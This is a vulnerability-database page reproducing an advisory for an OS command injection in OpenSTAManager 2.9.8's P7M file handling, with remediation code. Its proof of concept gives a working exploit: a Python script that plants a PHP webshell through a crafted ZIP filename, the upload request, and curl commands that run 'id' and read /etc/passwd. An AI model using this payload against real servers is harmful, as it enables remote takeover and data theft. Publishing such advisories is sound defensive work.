Vulners
Lucene search
📄 OpenSTAManager 2.9.8 Command Injection
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Devcode Openstamanager | 11 Apr 202619:13 | – | githubexploit |
 | CVE-2025-69212 | 6 Feb 202618:12 | – | attackerkb |
 | CVE-2025-69212 | 6 Feb 202616:48 | – | circl |
 | OpenSTAManager 操作系统命令注入漏洞 | 6 Feb 202600:00 | – | cnnvd |
 | CVE-2025-69212 | 6 Feb 202618:12 | – | cve |
 | CVE-2025-69212 OpenSTAManager has an OS Command Injection in P7M File Processing | 6 Feb 202618:12 | – | cvelist |
 | EUVD-2025-206884 | 6 Feb 202618:12 | – | euvd |
 | OpenSTAManager has an OS Command Injection in P7M File Processing | 6 Feb 202617:59 | – | github |
 | CVE-2025-69212 | 6 Feb 202619:16 | – | nvd |
 | CVE-2025-69212 OpenSTAManager has an OS Command Injection in P7M File Processing | 6 Feb 202618:12 | – | osv |
10
# CVE-2025-69212: OpenSTAManager has an OS Command Injection in P7M File Processing
## Overview
| Field | Details |
|---|---|
| **CVE ID** | [CVE-2025-69212](https://nvd.nist.gov/vuln/detail/CVE-2025-69212) |
| **Severity** | CRITICAL |
| **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
## Affected Products
- **devcode-it/openstamanager** (versions: <= 2.9.8)
## CWE Classification
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
## Details
## Summary
A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
## Vulnerable Code
**File:** `src/Util/XML.php:100`
```php
public static function decodeP7M($file)
{
$directory = pathinfo($file, PATHINFO_DIRNAME);
$content = file_get_contents($file);
$output_file = $directory.'/'.basename($file, '.p7m');
try {
if (function_exists('exec')) {
// VULNERABLE - No input sanitization!
exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"', $output, $cmd);
```
**The Problem:**
- The `$file` parameter is passed directly into `exec()` without sanitization
- Although wrapped in double quotes, an attacker can escape them
- The filename comes from uploaded ZIP archives (user-controlled)
## Attack Vector
### Entry Points:
1. **plugins/importFE_ZIP/actions.php:126** (when automatic import is enabled)
```php
foreach ($files_xml as $xml) {
if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml); // $xml from ZIP!
```
2. **plugins/importFE/src/FatturaElettronica.php:56** (constructor)
```php
if (string_ends_with($name, '.p7m')) {
$file = XML::decodeP7M($this->file); // $name from user input!
```
### Attack Flow:
1. Attacker creates ZIP with malicious filename
2. Upload ZIP via importFE_ZIP plugin
3. Application extracts ZIP and iterates files
4. For `.p7m` files, `decodeP7M()` is called
5. Malicious filename is injected into `exec()` command
6. Arbitrary command executes as web server user
## Proof of Concept
**⚠️ IMPORTANT NOTE:** PHP's `ZipArchive::extractTo()` splits filenames on `/` character. Payload must NOT contain `/` in commands. Use `cd directory && command` instead of absolute paths.
### Step 1: Create Malicious ZIP
```python
import zipfile
cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'
with zipfile.ZipFile('exploit.zip', 'w') as zf:
zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")
```
### Step 2: Upload ZIP
```http
POST /actions.php HTTP/1.1
Host: localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
Content-Type: application/zip
[ZIP CONTENT]
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Content-Disposition: form-data; name="op"
save
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_module"
14
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_plugin"
48
------WebKitFormBoundaryBKunENXxjEx5VrRc--
```
<img width="2539" height="809" alt="image" src="https://github.com/user-attachments/assets/f39cf6ad-9e8d-41de-866e-e01ec2064fd1" />
<img width="1543" height="659" alt="image" src="https://github.com/user-attachments/assets/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be" />
### Step 3: Exploitation Result
**Response (500 error is expected - XML parsing fails AFTER command execution):**
```http
HTTP/1.1 500 Internal Server Error
{"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}
```
**Verification - Webshell Created:**
<img width="1111" height="239" alt="image" src="https://github.com/user-attachments/assets/d2e36cf3-c438-4509-be46-36d5c6f3e0d1" />
### Step 4: Remote Code Execution
**Webshell is publicly accessible without authentication:**
```bash
$ curl "http://localhost:8081/files/SHELL.php?c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
[Full /etc/passwd output]
```
<img width="698" height="475" alt="image" src="https://github.com/user-attachments/assets/7ee4630b-95a8-450c-bdce-d6f703c8168d" />
## Impact
- **Remote Code Execution:** Full server compromise
- **Data Exfiltration:** Access to all application data and database
- **Privilege Escalation:** Potential escalation if web server runs with elevated privileges
- **Persistence:** Install backdoors and maintain access
- **Lateral Movement:** Pivot to other systems on the network
## Prerequisites
- Authenticated user with access to invoice import functionality
## Remediation
### Input Sanitization
```php
public static function decodeP7M($file)
{
// Validate that file path doesn't contain shell metacharacters
if (preg_match('/[;&|`$(){}\\[\\]<>]/', $file)) {
throw new \Exception('Invalid file path');
}
// Better: use escapeshellarg()
$safe_file = escapeshellarg($file);
$safe_output = escapeshellarg($output_file);
exec("openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output", $output, $cmd);
}
```
or
### Validate Filename Before Processing
```php
// In the upload handler, validate filenames from ZIP
foreach ($files_xml as $xml) {
// Only allow alphanumeric, dots, dashes, underscores
if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
continue; // Skip invalid filenames
}
if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml);
}
}
```
## Credit
Discovered by: Łukasz Rybak
## References
- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36
- https://nvd.nist.gov/vuln/detail/CVE-2025-69212
- https://github.com/advisories/GHSA-25fp-8w8p-mx36
## Disclaimer
This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.18.8
CVSS 49.4
EPSS0.01755
SSVC